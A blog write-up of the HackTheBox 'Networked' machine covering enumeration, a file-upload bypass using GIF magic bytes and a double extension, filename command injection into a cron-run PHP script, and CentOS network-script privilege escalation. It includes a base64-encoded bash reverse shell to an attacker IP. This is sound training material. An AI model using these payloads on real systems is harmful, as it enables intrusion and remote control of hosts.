d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-networked-htb/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

195 lines
5.6 KiB
Markdown
Raw Blame History

---
title: "Writeup - Networked (HTB)"
date: 2022-05-27
slug: "writeup-networked-htb"
type: "writeup-ctf"
---
This is a writeup for the [Networked](https://app.hackthebox.com/machines/Networked) machine from the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.11.146
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.4)
- 80/tcp : HTTP web server (Apache 2.4.6)
![](img/image-2.webp)
## Exploit
First, I start by scanning the pages of the website.
![](img/image-3.webp)
I find several pages interesting and especially `backup` in which you can find an archive.
![](img/image-4.webp)
I download the archive, unzip it and find the following files inside:
![](img/image-5.webp)
The different files correspond to pages of the site:
![](img/image-6.webp)
![](img/image-7.webp)
So we have the possibility to upload images on the `upload.php` page and then to view them on the `photos.php` page.
By analyzing the source code of the `upload.php` page I find that there are checks on the upload files.
```php
[...]
list ($foo,$ext) = getnameUpload($myFile["name"]);
$validext = array('.jpg', '.png', '.gif', '.jpeg');
$valid = false;
foreach ($validext as $vext) {
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
$valid = true;
}
}
[...]
```
So I'm not just going to be able to send a PHP reverse shell with the `.png` extension because the site checks the file signature to verify its type. The signature of a file is a set of magic byte at the beginning of a file. By looking in the following list I find the signature of the GIF files: [files signatures](https://en.wikipedia.org/wiki/List_of_file_signatures).
Before adding the signature, my file is simply a Unicode text:
![](img/image-8.webp)
After adding the GIF signature, we can see that the file is now identified as a GIF image data.
![](img/image-9.webp)
In addition to this signature I will have to change the extensions so that the file passes the security, but also that it is executed as PHP by the server:
```bash
mv reverse.jpg reverse.php.gif
```
I can now upload it and go view it to execute the code and run the reverse shell.
![](img/image-10.webp)
I now have a reverse shell as `apache`. But I don't have the access to see the first flag. In the user's home folder, I notice 2 interesting files:
![](img/image-11.webp)
The first one is a CRON file that executes the `check_attack.php` script every 3 minutes.
```bash
*/3 * * * * php /home/guly/check_attack.php
```
The second one is the script that allows you to delete suspicious files from the `/var/www/html/uploads` :
```php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";
#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>
```
Interestingly, the script executes an `rm` command with a variable directly. All this without verification! So I will be able to create a file with a name composed of a command.
The file name will be composed of a name, then a `;` to indicate the end of the command, then a reverse shell in base64 because we are not allowed to put `/` in the file name.
To create the file I use the following command:
```bash
touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash'
```
I wait a few seconds and now I have a reverse shell and I can get the first flag.
![](img/image-12.webp)
## Privilege escalation
First I check the sudo permissions of my user :
![](img/image-13.webp)
I have the right to run the `changename.sh` script as root. Looking at the code of the script, I determine that it allows to change the name of a network interface.
```bash
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
```
After some research on the Linux distributions used by the machine I find the following flaw: [CentOS Network Interface Exploit](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f).
On CentOS there is an exploit that allows to execute commands as `root` via the name of a network interface.
I execute the script and enter the following name for the interface:
![](img/image-14.webp)
I now have a reverse shell `root` and I can get the last flag.
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Do not leave the source code of the website accessible by all
- Set up an additional protection on the upload to avoid sending code
- Do not use variables in commands without Sanitizing
Reference in New Issue View Git Blame Copy Permalink